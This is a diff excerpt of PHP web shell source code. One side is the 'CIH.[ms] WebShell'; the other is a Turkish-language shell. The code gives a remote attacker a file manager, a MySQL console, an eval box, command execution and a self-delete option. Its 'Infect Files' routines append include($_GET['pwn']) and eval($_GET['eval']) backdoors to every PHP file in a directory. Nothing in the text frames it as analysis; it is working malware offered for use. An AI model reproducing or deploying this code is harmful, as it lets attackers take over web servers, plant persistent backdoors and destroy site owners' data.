394	-	echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:98%;' name='wrcont'></textarea>
394	+	if(isset($mkdir)) {
395
396	-	<input type='hidden' name='path' value='".$_POST['curdir']."'><input type='hidden' name='curdir' value='".$_POST['curdir']."'>
396	+
397	-	<input type='text' name='nfname' class='form' style='width:28%; background:#252525;margin-bottom:1px; margin-right:1px;' value='file.txt'><input type='submit' name='wrfile' class='form' value='create file' style='width:70%'></form><br/>";
397	+
398	-	do_footer($ver); die();break;
398	+	mkdir($mkdir);
399
400	-	case 'New Dir':
400	+	if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } }
401	-	$curdir = $_POST['curdir'];
401	+
402	-	echo "<form method='post' action='' style='margin:0px;'><input type='hidden' name='curdir' value='$curdir'><input type='hidden' name='path' value='$curdir'><input type='text' name='dirname' class='form' style='width:90%; margin-right:1px;' size='100'><input type='submit' style='width:60px;' class='form' value='go!'></form><br/>";
402	+
403	-	do_footer($ver);die();break;
403	+
404	-	case 'Upload':
404	+	// Delete Directory
405	-	if (isset($_FILES['userfile'])) {
405	+
406	-	$file = $_FILES['userfile'];
406	+
407	-	$curdir = $_POST['path'];
407	+
408	-	if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; }
408	+	if(isset($mydir) && $mydir != "$dir") {
409	-	if($file['error']!=0) error($file['error']);
409	+
410	-	else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..</div>");}}}
410	+	$d = dir($mydir);
411	-	echo "<table style='width:100%; font-size:10px;'><tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Upload from your computer:</b></td></tr>
411	+
412	-	<tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctype='multipart/form-data' method='post' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='$path'> <input type='hidden' name='fileact' value='Upload'><input name='userfile' size='85' value='' class='form' type='file' style='border:1px solid #444;'><br/><br/>New name :<input name='newfilech' value='1' type='checkbox'><input type='text' name='newfile' style='width:20%;' class='form' value='filename.php'/><input type='submit' style='width:60px;' class='form' value='go!'></form></td></tr>
412	+	while($entry = $d->read()) {
413	-	<tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr>
413	+
414	-	<tr style='background:#222; font-size:1px;'><td> </td></tr></table>";do_footer($ver);die();break;
414	+	if ($entry !== "." && $entry !== "..") {
415	-	}}
415	+
416	-	# File Manager : File actions
416	+	unlink($entry);
417	-	if(isset($_POST['newname'])) // rename
417	+
418	-	{rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to  ".$_POST['newname']."...");}
418	+
419	-	if(isset($_POST['newpath'])) //copy
419	+
420	-	{copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo " <div class='notice'>File was successfuly copied to  <b>".$_POST['newpath']."</b>...</div>";}
420	+
421	-	if(isset($_POST['chmod'])) // chmod
421	+
422	-	{$a = chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo " <div class='notice'>We hope that permissions for file were successfuly changed to  <b>".$_POST['chmod']."</b> ^^</div>";}
422	+	$d->close();
423	-	if(isset($_POST['touch'])) // touch
423	+
424	-	{$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo " <div class='notice'>We hope that touch for file were successfuly changed to  <b>".$_POST['touch']."</b> ^^</div>";}
424	+	rmdir($mydir);
425	-	if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file
425	+
426	-	$wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "<div class='notice'>File <b>$wrpath</b>   was successfuly modified</div>";}
426	+
427	-	if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file
427	+
428	-	{$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}}
428	+
429	-	if (isset($_POST['dirname']) && isset($_POST['curdir'])) // new directory
429	+
430	-	{$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']." was successfuly created.");}else{error('An error occured while creating dir', $ver);}
430	+
431
432	-	# File Manager : Directory actions
432	+	//Infect Files [RFI]
433	-	if (isset($_POST['ddo']) && isset($_POST['dirr'])){
433	+
434	-	switch($_POST['ddo']){
434	+
435	-	case 'rename':
435	+
436	-	echo" <form method='post' action='' style='margin:0px;'><input type='hidden' name='path' value='".$pwd."'><input type='text' name='ffile' class='form' value='".$_POST['dirr']."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form' value='".$_POST['dirr']."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>";
436	+	if(isset($_POST['inf3ct']))
437	-	do_footer($ver);die();break;
437	+
438	-	case 'delete':
438	+
439	-	rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']." was successfuly deleted.");do_footer($version);break;}}
439	+
440	-	if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){
440	+	foreach (glob("*.php") as $lola)
441	-	unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("<b>".$_POST['ffile']."</b> was successfuly deleted.");break;
441	+
442	-	}if(isset($_POST['diract']))
442	+
443	-	{$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']);
443	+
444	-	echo"
444	+	$dira = '.';
445	-	<div style='padding:2px;'><div style='background:#272727; padding:3px; margin-bottom:3px;text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px; font-size:9px; text-align:left;'>dir:$path  \|   permissions: <b>$perms </b>  </div><div style='padding:4px; padding-left:30px; font-size:9px; font-weight:bold; color:#999; text-align:left;'><form method='post' action=''><input type='hidden' name='dirr' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'>      ><input type='submit' class='m' name='ddo' value='rename' style='margin-bottom:0px; background:#222;'><br/>      ><input type='submit' class='m' name='ddo' value='delete' style='margin-bottom:0px; background:#222;'><br/><br/><br/></form></div><div style='background:#272727; font-size:9px;'> </div></div>";do_footer($ver);die();}
445	+
446	-	# switch $do
446	+	$asdi = fopen($lola, 'a+');
447	-	#
447	+
448	-	if (isset($_REQUEST['do']))
448	+	@fwrite($asdi, '
449
450	-	switch ($_REQUEST['do']){
450	+
451	-	case 'mysql':
451	+
452	-	if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '<div >';$sqlq = $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db)
452	+	include($_GET[\'pwn\']);
453	-	{if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) {
453	+
454	-	$number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;}
454	+	?>');
455	-	echo "<div class='str' style='border-top:1px solid #333; '>query # <b>".$number."</b>:".htmlspecialchars($query)."</div>";
455	+
456	-	if ($error){ notice("Error : <b>".$error."</b>"); }
456	+	@fclose($asdi);
457	-	else {if(is_array($r)){echo '<table style="width:100%; background:#222;">';
457	+
458	-	if(is_array($r[0])){echo "<tr style='background:#292929; font-size:10px;'>";foreach($r[0] as $n=>$v){echo "<td style='padding:5px;'><b>$n</b></td>";}echo '</tr>';}foreach($r as $a){echo "<tr style='background:#232323;'>";
458	+
459	-	if(is_array($a)){foreach($a as $n=>$v){echo "<td class='my'>$v</td>";}}else{echo "<td class='file'>$a</td>";}echo '</tr>';}echo '</table>';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) {
459	+
460	-	echo "<div class='str' style='margin-top:3px; border-bottom:1px solid #333; padding:3px;'>affected rows : <b>".$rows."</b></div>"; }
460	+	if($asdi)
461	-	}} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '</div>'; }
461	+
462	-	echo "<form action='' method='post' style='margin:0px; margin-top:15px;'>
462	+
463	-	<table style='width:100%; height:40%'><tr><td valign='top' style='background:#272727; padding:3px;'><textarea class='txt' cols='70' rows='15' name='sql' style='width:100%; height:99%'>";
463	+
464	-	if(isset($_POST['sql'])){echo $_POST['sql'];} else echo 'SHOW DATABASES;';
464	+	$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
465	-	echo "</textarea></td><td style='width:150px; background:#272727;' valign='top' >
465	+
466	-	<input type='text' name='mysqlw_host' class='txt' style='margin:10px; height:24px;' value='$dbhost'/><input type='text' name='mysqlw_db' class='txt' style='margin:10px; height:24px;' value='$dbname'/><input type='text' name='mysqlw_login' class='txt' style='margin:10px; height:24px;' value='$dblogin'/><input type='txt' name='mysqlw_passw' class='txt' style='margin:10px; height:24px;' value='$dbpass'/><input type='text' name='mysqlw_port' class='txt' style='margin:10px; height:24px;' value='$dbport'/><br/></td><tr><td colspan=2 valign='top' style='height:5%;'><input type='hidden' name='do' value='mysql'><input type='submit' class='txt' style='width:100%; margin:0px; margin-bottom:5px; ' value='go!'></td></tr></table></form><br/>";
466	+
467	-	do_footer($ver); die(); break;
467	+
468	-	case 'server':
468	+
469	-	echo '<table class="str" style="width:100%">';foreach($_SERVER as $k=>$v)
469	+
470	-	{echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td>$v</td></tr>";}echo '</table>';do_footer($ver);
470	+	$textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
471	-	die();break;
471	+
472	-	case 'envinfo':
472	+
473	-	echo '<table class="str" style=" width:100%">';foreach($_ENV as $k=>$v)
473	+
474	-	{echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td style='padding:3px;'>$v</td></tr>";}echo '</table><br/>';do_footer($ver);die();break;
474	+
475	-	case 'delete':
475	+
476	-	if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "<div class='notice'>cihshell has been deleted successfully..bye-bye ): </div><br/><br/>"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break;
476	+
477	-	case 'eval':
477	+
478	-	echo "<form method='post' action='' style='padding:0px; margin-top:5px;'><input type='hidden' name='do' value='eval' style='border-bottom:1px solid #444;'> <textarea name='eval' class='form' style='height:100px;'>";
478	+	//Infect Files [Eval]
479	-	if (isset($_POST['eval'])){echo $_POST['eval'];} else {echo 'code here (:';}
479	+
480	-	echo "</textarea><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form><br/>";
480	+	if(isset($_POST['evalinfect']))
481	-	if (isset($_POST['eval'])){
481	+
482	-	echo "<table class='txt' style='margin-left:13px; width:98%; height:60%'><tr><td valign='top'>";code_eval();echo "</td></tr></table><br/>";}
482	+
483	-	do_footer($ver);die(); break;
483	+
484	-	case 'shell':
484	+	foreach (glob("*.php") as $lal)
485	-	echo " <textarea class='txt' style='width:98%; height:60%; background:#262626' rows='30'>";if($safe_mode == 'On'){ echo "Safe mode is on..";}if(isset($_POST['alias'])){ foreach ($alias as $k=>$v) { if ($_POST['alias'] == $k){cmd_exec($v);}}} else {cmd_exec($safe_mode);}if(isset($_POST['cmdir'])) {$dirr = $_POST['cmdir'];} else {$dirr = $path;}echo "</textarea>";echo "<form method='post' action='' style='padding:0px; margin-top:5px; margin-bottom:15px;'><input type='hidden' name='do' value='shell'><input type='text' name='cmd' value='";if (isset($_POST['cmd'])){echo $_POST['cmd'];} elseif ($os == 'win'){echo 'dir';} else{echo 'ls';}echo "' class='form' style='width:98%; margin-bottom:2px;'><input type='text' name='cmdir' value='$dirr' class='form' style='color:#444;width:98%'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form>";echo"<form method='post' action='' style='border-top:1px solid #282828; margin:0px;'><select name='alias' class='form' style='width:98%; margin-top:5px;'>";foreach($alias as $k=>$v){echo "<option>$k</option>";}echo "</select><input type='hidden' name='do' value='shell'><input type='hidden' name='cmdir' value='$dirr'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'</form><br/><br/>";do_footer($ver); die();break;
485	+
486	-	case 'cihshell':echo "<div class='str' style='text-align:center;'><table class='str' style='width:100%'><tr>
486	+
487	-	<td style='border-right:1px solid #333; width:200px;'><div style=' padding:50px; margin-top:50px; margin-bottom:50px; border-top:1px solid #333; border-bottom:1px solid #333;'>Coded by <b>Berkut</b>. <br/><br/>© 2007 <br/><hr>Fixed by <b>DCRM</b>. <br/></br>© 2008 <br/></div></td><td valign='top' style='padding-left:30px;'><br/><br/><span style='font-size:20px; color:#666;'>CIH.[ms] WebShell<sup style='font-size:12px; color:#444;'> v.$ver</sup></span><br/><br/><br/>It has so many strong points that it is impossible to write them here (:</td></tr></table></div>";do_footer($ver); die();break;
487	+
488	-	default: error('There is no such function',$ver);
488	+	$dira = '.';
489	-	break;}}
489	+
490	-	# file actions
490	+	$axd = fopen($lal, 'a+');
491	-	if(is_file($path))
491	+
492	-	{$perms = fperms($path); $size = filesize($path."/".$file); $size = conv_size($size); $size_fix = conv_size(filesize($path)); $pp = $_POST['f_path'];$ppp = $_POST['f_file'];
492	+	@fwrite($axd, '
493	-	echo "<div style='padding:2px;'><div style='background:#292929; padding:10px; margin-bottom:3px; text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px; font-size:9px; text-align:left;'>file: <span style='color:#666;'>$path</span>  \|   permissions: <b style='color:#666;'>$perms </b>  \|   size: <span style='color:#666;'>$size_fix</span>  \|   Create time: <span style='color:#666;'>".date("d.m.Y H:i:s",filectime($path))."</span>  \|  Modify time: <span style='color:#666;'>".date("d.m.Y H:i:s",filemtime($path))."</span></div><table style='width:100%; font-size:10px;'><tr><td style='width:200px; border-right:1px solid #292929; vertical-align:top; padding:0px; padding-left:5px;'> <form method='post' action=''><input type='hidden' name='ffile' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='view' style=''></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='view in HEX' style=''></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='edit'></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='preview' ></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='download'></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:40px;'><input type='submit' class='fa1' name='fdo' value='delete'></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa1' name='fdo' value='copy' ></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='rename' ></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='chmod' ></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='touch' ></div></td><td style='padding:3px; vertical-align:top;'>";
493	+
494	-	if (isset($_POST['fdo']) && isset($_POST['ffile'])){
494	+
495	-	$ffile = $_POST['ffile'];
495	+
496	-	switch($_POST['fdo']){
496	+	eval(stripslashes($_GET[\'eval\']));
497	-	case 'view':
497	+
498	-	fileread2($ffile, $stringnum);
498	+	?>');
499	-	break;
499	+
500	-	case 'view in HEX':
500	+	@fclose($axd);
501
502	-	$fi=fopen($path,"rb");
502	+
503	-	if ($fi) {$str = fread($fi,filesize($path));$n=0;$a0="00000000<br/>";$a1="";$a2="";
503	+
504	-	for ($i=0; $i<strlen($str); $i++) {$a1.=sprintf("%02X",ord($str[$i])).' ';switch (ord($str[$i])) {case 0: $a2.="0"; break;case 32: case 10:case 13: $a2.=" "; break;default: $a2.=htmlspecialchars($str[$i]);}$n++;if ($n==$hexdump_rows) {$n=0;if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";$a1.="<br>";$a2.="<br>";}}echo "<table style='font-size:10px;'><tr><td style='border-right:1px solid #292929; color:#444; padding:4px;'>$a0</td><td style='color:#666; padding:4px;'>$a1</td><td style='border-left:1px solid #292929; color:#444; padding:4px;'>$a2</td></tr>";echo"</table>";
504	+	if($axd)
505	-	}break;
505	+
506	-	case 'edit':
506	+
507	-	echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:100%;' name='wrcont'> ";
507	+
508	-	fileread($ffile);echo "</textarea><input type='hidden' name='ffile' value='$ffile'><input type='hidden' name='path' value='".$path."'><input type='submit' name='wrfile' class='form' value='save file' style='width:100%; margin-top:5px;'></form><br/>"; break;
508	+	$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
509	-	case 'chmod':
509	+
510	-	echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='chmod' class='form' value='".substr(sprintf('%o', fileperms($path)), -4)."' style='width:10%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form' value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
510	+
511
512	-	case 'touch':
512	+
513	-	echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='touch' class='form' value='".date("d M Y H:i:s",filemtime($path))."' style='width:15%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form' value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
513	+
514		$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
515	-	case 'rename':
515	+
516	-	echo" <form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form' value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form' value='".$path."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>";break;
516	+
517	-	case 'copy':
517	+
518	-	echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form' value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newpath' class='form' value='".$path."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='copy!'></form><br/>";break; }}
518	+
519
520	-	$fh = fopen($path, 'r'); if (!$fh){error('Could not open file',$ver);}echo '<table style="font-size:10px; width:100%; background:#222; ">';if ($stringnum){$i=1;while(!feof($fh) & $i<=30) {$line = fgets($fh); echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>'; $i++;}}else {while(!feof($fh) & $i<=30) {$line = fgets($fh); echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; }}echo '</table>';}
520	+
521	-	echo '</td></tr></table></div>';do_footer($ver);die();}
521	+
522	-	elseif (is_dir($path))
522	+	// Images
523	-	{
523	+
524	-	$dirs=array();
524	+	if(@$_GET['com'] == "image")
525	-	$files=array();
525	+
526	-	$dir=opendir($path);
526	+	{
527	-	while (($file=readdir($dir))!==false) { if ($file=="." \|\| $file=="..") continue;
527	+
528	-	if (is_dir("$path/$file")) {$dirs[]=$file;}
528	+	$images = array(
529	-	else {$files[]=$file;}}closedir($dir);
529	+
530		"folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
531
532	-	else {error('it isn\'t a directory', $ver);}
532	+	"file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
533	-	if (!$dir){error('An error occured while opening directory '.$path, $ver);}
533	+
534	-	sort($dirs);
534	+	"floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
535	-	sort($files);
535	+
536	-	echo "<table style='width:100%; background:#222;'>";
536	+	);
537	-	echo "<tr><td colspan=6 class='filet' style='background:#282828; padding:0px; border-top:1px solid #2e2e2e; height:30px;'>";
537	+
538	-	# drives
538	+	header("Content-type: image/gif");
539	-	if ($os == "win") {
539	+
540	-	echo "<form method='post' action='' style='padding:0px; margin:0px; float:left;'>";echo "<input type='button' value='Drives:' class='fm' style='font-weight:bold;'>";for($d='c';$d<='z';$d++){if(is_dir($d.":/"))echo "<input type='submit' value='".$d.":/' class='fm' name='path'>"; }echo "</form>";}echo "<form method='post' action='' style='padding:0px; margin:0px; float:right;' >";
540	+	header("Cache-control: public");
541	-	echo "<input type='submit' name='diract' class='fm' value='directory actions' style='margin-bottom:0px; font-weight:bold; color:#666;'><input type='hidden' name='curdir' value='$path'><input type='hidden' name='cmdir' value='$path'><span style='color:#666;'>\|</span><input type='submit' name='fileact' value='New File' class='fm'><span style='color:#666;'>\|</span><input type='submit' style='margin:0px;' name='fileact' value='New Dir' class='fm'><span style='color:#666;'>\|</span><input type='submit' name='fileact' value='Upload' class='fm'>";echo "</form>";
541	+
542	-	echo "</td></tr>";echo "<tr style='background:#272727;'><td style='width:3%; '> </td><td style='width:300px; color:#888;' class='filet'><b>name</b></td><td class='filet' style='color:#888;'><b>size</b></td><td class='filet' style='color:#888;'><b>last modified</b></td><td class='filet' style='color:#888;'><b>permissions</b></td></tr>";echo "<form method='post' action=''><input type='hidden' name='f_path' value='$path'>";
542	+	header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
543	-	for ($i=0; $i<count($dirs); $i++) {
543	+
544	-	$size = '---';
544	+	header("Cache-control: max-age=".(606024*7));
545	-	$perms = fperms($path."/".$dirs[$i]);
545	+
546	-	$ico = '<b>dir</b>';
546	+	header("Last-Modified: ".date("r",filemtime(__FILE__)));
547	-	$last_mod = date('d.m.y H:i:s', fileatime($path."/".$file));if(!$last_mod){$last_mod = "---";}
547	+
548	-	echo" <tr style='background:#252525;'><td class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file' class='dir' value='$dirs[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";}
548	+	$image = $images[$_GET['img']];
549
550	-	for ($i=0; $i<count($files); $i++) {
550	+	echo base64_decode($image);
551	-	# filesize
551	+
552	-	if (is_link($path."/".$files[$i])) {$size = "---";} else {$size = filesize($path."/".$files[$i]); $size = conv_size($size); if($size == '0B'){$size = '---';} }
552	+
553	-	# date
553	+
554	-	$last_mod = date('d.m.y H:i:s', fileatime($path."/".$files[$i]));if(!$last_mod){$last_mod = "---";}
554	+	//File List
555	-	#perms
555	+
556	-	$perms = fperms($path."/".$files[$i]);
556	+
557	-	#filetype (ico)
557	+
558	-	$ico = ''; if(is_link($path."/".$files[$i])) {$ico = 'link';}
558	+	chdir($dir);
559	-	else{
559	+
560	-	// filetypes for file manager
560	+	if(!isset($dir)) { $dir = @realpath("."); }
561	-	$filetypes = array(
561	+
562	-	"php"=> array("php","phtml","php3","php4","inc"),
562	+	if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
563	-	"exe"=>array("sh","install","bat","cmd"),
563	+
564	-	"ini"=>array("ini","inf"),
564	+	if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
565	-	"html"=>array("html","htm","shtml"),
565	+
566	-	"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
566	+	$pahtw = 0;
567	-	"code"=>array("tcl","h","c","cpp", "pl", "cgi"),
567	+
